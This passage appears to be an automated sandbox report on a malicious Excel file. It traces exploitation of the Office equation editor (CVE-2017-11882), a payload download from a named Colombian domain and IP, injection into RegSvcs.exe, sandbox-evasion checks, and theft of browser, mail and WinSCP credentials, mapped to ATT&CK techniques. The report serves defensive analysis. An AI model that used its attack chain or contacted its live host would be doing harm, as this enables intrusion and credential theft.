                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: TR-AHYO-12-13-2024.xlam.xlsxInitial sample: OLE zip file path = xl/media/image1.png
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: wntdll.pdb source: fryvcftyii.exe, 00000005.00000003.476364985.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000003.476210575.0000000002A60000.00000004.00001000.00020000.00000000.sdmp
                  Source: TR-AHYO-12-13-2024.xlam.xlsxInitial sample: OLE indicators vbamacros = False
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C4B37 LoadLibraryA,GetProcAddress,5_2_003C4B37
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E8945 push ecx; ret 5_2_003E8958
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_003C48D7
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_00445376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_00445376
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exeCode function: 5_2_003E3187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_003E3187
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | API/Special instruction interceptor: Address: E948BC
                  Source: fryvcftyii.exe, 00000005.00000003.473351327.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000003.473274593.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000002.478493824.0000000000E95000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
                  Source: fryvcftyii.exe, 00000005.00000002.478445579.0000000000E24000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXERG
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_5-102405)
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | API coverage: 4.6 %
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3432 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042445A GetFileAttributesW,FindFirstFileW,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042C6D1 FindFirstFileW,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_004237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_00423B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | API call chain: ExitProcess graph end node (graph_2-344)
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | API call chain: ExitProcess graph end node (graph_5-100896)
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | API call chain: ExitProcess graph end node (graph_5-100830)
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_00433F09 BlockInput
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003F5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003C4B37 LoadLibraryA,GetProcAddress
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036A05EF mov edx, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_00E93508 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_00E94B88 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_00E94B28 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_004180A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003EA124 SetUnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003EA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_004187B1 LogonUserW
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_00424C53 mouse_event
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_00417CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0041874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                  Source: fryvcftyii.exe, 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp, ngown[1].exe.2.dr, fryvcftyii.exe.2.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: fryvcftyii.exe | Binary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003E862B cpuid
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003F4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_00401E06 GetUserNameW
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003F3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_003C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: fryvcftyii.exe, 00000005.00000003.473351327.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000003.473274593.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000002.478493824.0000000000E95000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procmon.exe
                  Source: fryvcftyii.exe, 00000005.00000003.473351327.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000003.473274593.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000002.478493824.0000000000E95000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mcupdate.exe

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.fryvcftyii.exe.180000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: fryvcftyii.exe PID: 3552, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: fryvcftyii.exe | Binary or memory string: WIN_81
                  Source: fryvcftyii.exe | Binary or memory string: WIN_XP
                  Source: fryvcftyii.exe | Binary or memory string: WIN_XPe
                  Source: fryvcftyii.exe | Binary or memory string: WIN_VISTA
                  Source: fryvcftyii.exe | Binary or memory string: WIN_7
                  Source: fryvcftyii.exe | Binary or memory string: WIN_8
                  Source: fryvcftyii.exe.2.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.fryvcftyii.exe.180000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.620861905.00000000021A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: fryvcftyii.exe PID: 3552, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.fryvcftyii.exe.180000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.fryvcftyii.exe.180000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: fryvcftyii.exe PID: 3552, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 3560, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_00436283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
                  Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_00436747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information1
                  Scripting
                  2
                  Valid Accounts
                  121
                  Windows Management Instrumentation
                  1
                  Scripting
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  3
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  121
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts33
                  Exploitation for Client Execution
                  2
                  Valid Accounts
                  2
                  Valid Accounts
                  2
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  2
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  NTDS138
                  System Information Discovery
                  Distributed Component Object Model121
                  Input Capture
                  12
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  1
                  Masquerading
                  LSA Secrets45
                  Security Software Discovery
                  SSH3
                  Clipboard Data
                  Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Valid Accounts
                  Cached Domain Credentials12
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                  Virtualization/Sandbox Evasion
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  Remote System Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Behavior Graph ID: 1574864 | Sample: TR-AHYO-12-13-2024.xlam.xlsx | Startdate: 13/12/2024 | Architecture: WINDOWS | Score: 100
                  Sample signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 16 other signatures
                  EXCEL.EXE (started)
                    dropped: C:\Users\...\~$TR-AHYO-12-13-2024.xlam.xlsx, data
                    EQNEDT32.EXE (started)
                      DNS/IP: aquafusion.com.co, 190.90.160.170, 49161, 80, GTDCOLOMBIASASCO, Colombia
                      dropped: C:\Users\user\AppData\...\fryvcftyii.exe, PE32
                      dropped: C:\Users\user\AppData\Local\...\ngown[1].exe, PE32
                      signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                      fryvcftyii.exe (started)
                        signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 4 other signatures
                        RegSvcs.exe (started)
                          signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 2 other signatures

                  Source | Detection | Scanner | Label | Link
                  TR-AHYO-12-13-2024.xlam.xlsx | 63% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882
                  TR-AHYO-12-13-2024.xlam.xlsx | 100% | Avira | EXP/CVE-2017-11882.Gen

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe | 100% | Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | 100% | Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
                  C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject

                  No Antivirus matches

                  No Antivirus matches

                  Source | Detection | Scanner | Label | Link
